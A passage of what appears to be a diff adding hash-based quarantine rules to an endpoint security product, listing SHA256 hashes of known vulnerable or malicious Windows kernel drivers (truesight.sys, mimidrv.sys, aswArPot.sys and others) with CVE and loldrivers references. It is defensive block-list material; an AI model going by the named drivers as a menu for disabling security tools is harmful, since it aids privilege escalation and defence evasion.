+ "creation_date": "2026-03-23T11:45:31.140531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce9f5e121384d24730c10fa0b6dfe58d9fc571b4e7b42e15482e210a387667cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "385ae001-036a-530b-bab0-ad0d9e50e48b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482027Z",
+ "creation_date": "2026-03-23T11:45:31.482031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "586d362f8801c8b2283d65172a3d53e87c9723efcdee239c5deb6dc6d100f2fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "386a35ca-3db3-5a0c-b2a4-593179209368",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622909Z",
+ "creation_date": "2026-03-23T11:45:29.622911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb7cb120d51e217ee4cc50bee619603be5eb6091634df45acc5249aed283c9be",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "386f6fd4-b740-5d17-ba4a-1f2946f6c96d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456723Z",
+ "creation_date": "2026-03-23T11:45:30.456726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a38c26c0754f6c9389ea43dd0149db26b95742c1b37468fcf0d8ced66da1dcb9",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3871fcc7-79c8-59aa-9448-76cde3b803c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147769Z",
+ "creation_date": "2026-03-23T11:45:31.147771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a32e9b71040976b39ddd57f36b48732ee1b9c5ad09dc0e4e905e6f59b904a301",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38764b2a-7cf1-5e17-b347-e51b416cc591",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466637Z",
+ "creation_date": "2026-03-23T11:45:30.466640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3894b46c-f3ee-5bf8-8f9e-ddd9031417a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462314Z",
+ "creation_date": "2026-03-23T11:45:30.462317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19bfc95d74b27684e420b985589105d51772100383e7c3790a34ae311fee03d8",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38ac0c0e-9c68-5337-a655-47b970ff8ce3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821078Z",
+ "creation_date": "2026-03-23T11:45:30.821081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61e7f9a91ef25529d85b22c39e830078b96f40b94d00756595dded9d1a8f6629",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38ae8fad-1131-56c7-b5be-610fd02d2e81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816630Z",
+ "creation_date": "2026-03-23T11:45:31.816634Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "599713f2250bd98187c4f1a8accf00552349ad4036a71c8f5fea0bf3ac7c39a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38b79364-ff42-5fd7-8927-0b3a4019337b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972491Z",
+ "creation_date": "2026-03-23T11:45:29.972493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18deed37f60b6aa8634dda2565a0485452487d7bce88afb49301a7352db4e506",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38c27d61-35b3-5c2c-830f-5d1938c600ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975828Z",
+ "creation_date": "2026-03-23T11:45:29.975832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea80b4a2314e44061f33a7403e0740437aa34326082e97816bb6e7693866478b",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38c70840-a01c-5c5b-8448-650475888eb7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811222Z",
+ "creation_date": "2026-03-23T11:45:31.811224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d223236124458c2e7c2373cf3fa86652516bf0b5cff91b6e142867d1e3d26a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38c8d154-a778-54a5-803a-1f40a4801553",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968439Z",
+ "creation_date": "2026-03-23T11:45:29.968441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38d8cddf-a3a4-5fd6-b9b6-9073836f94e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619371Z",
+ "creation_date": "2026-03-23T11:45:29.619373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e46bb410c3bb95a1f3d61ced157c679bfac7dc997534e46b83b234a6fc5cbb14",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38e46f37-c81d-5706-87de-89ec1285dff9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146275Z",
+ "creation_date": "2026-03-23T11:45:32.146279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146288Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01d51df682136cce453bb1da8964073e6bc7297ce4dae7301c753bb618a69469",
+ "comment": "Vulnerable Kernel Driver (aka ampa.sys) [https://www.loldrivers.io/drivers/ea0e7351-b65c-4c5a-9863-83b9d5efcec3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38e854fa-4638-51c8-9a42-fde360771eec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144158Z",
+ "creation_date": "2026-03-23T11:45:31.144160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a51e10099132a96829845dd8f6aaac1a8ba71d9fdabacc5068580eb89211ad6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38ec04fd-1785-52ca-bbe6-752758d981cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824060Z",
+ "creation_date": "2026-03-23T11:45:30.824063Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824068Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6bd14b5f9ace4e6615309cf6d26ede5871b0e32328b165273fd278bc6759199",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "38fef03b-8ddf-5749-8a51-24578c87880f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610263Z",
+ "creation_date": "2026-03-23T11:45:29.610264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610270Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11d258e05b850dcc9ecfacccc9486e54bd928aaa3d5e9942696c323fdbd3481b",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3914e5c0-d0b4-5fec-b050-c70035fbf320",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605700Z",
+ "creation_date": "2026-03-23T11:45:29.605702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16a2e578bc8683f17a175480fea4f53c838cfae965f1d4caa47eaf9e0b3415c1",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3914e932-423d-5d5f-977f-81c659219005",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822067Z",
+ "creation_date": "2026-03-23T11:45:30.822073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bbb894950dc19c804c44a7dce8fe9a7267311e992421faffa8912f8b8b4dc09e",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39312fba-ea16-5c58-8ba6-a609d1cc6ed0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827855Z",
+ "creation_date": "2026-03-23T11:45:30.827857Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a8a37ecd464e7120c31d23ee6c4e54f20fa714e1d2fbeb6979629784083ad4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39464beb-a7f3-5fd9-91bd-227e6f5e4108",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159692Z",
+ "creation_date": "2026-03-23T11:45:31.159694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44a9491e114f20b9f7a413fcfb9dbaebffbd88d8263322aa304667bb2ebf677b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39471791-6a55-512a-ae1a-be6b803dca39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470581Z",
+ "creation_date": "2026-03-23T11:45:30.470585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a04c696d544e36b5b5b054b3bfa8c7a5bc2aa261c48eded8f0265d82ec9157",
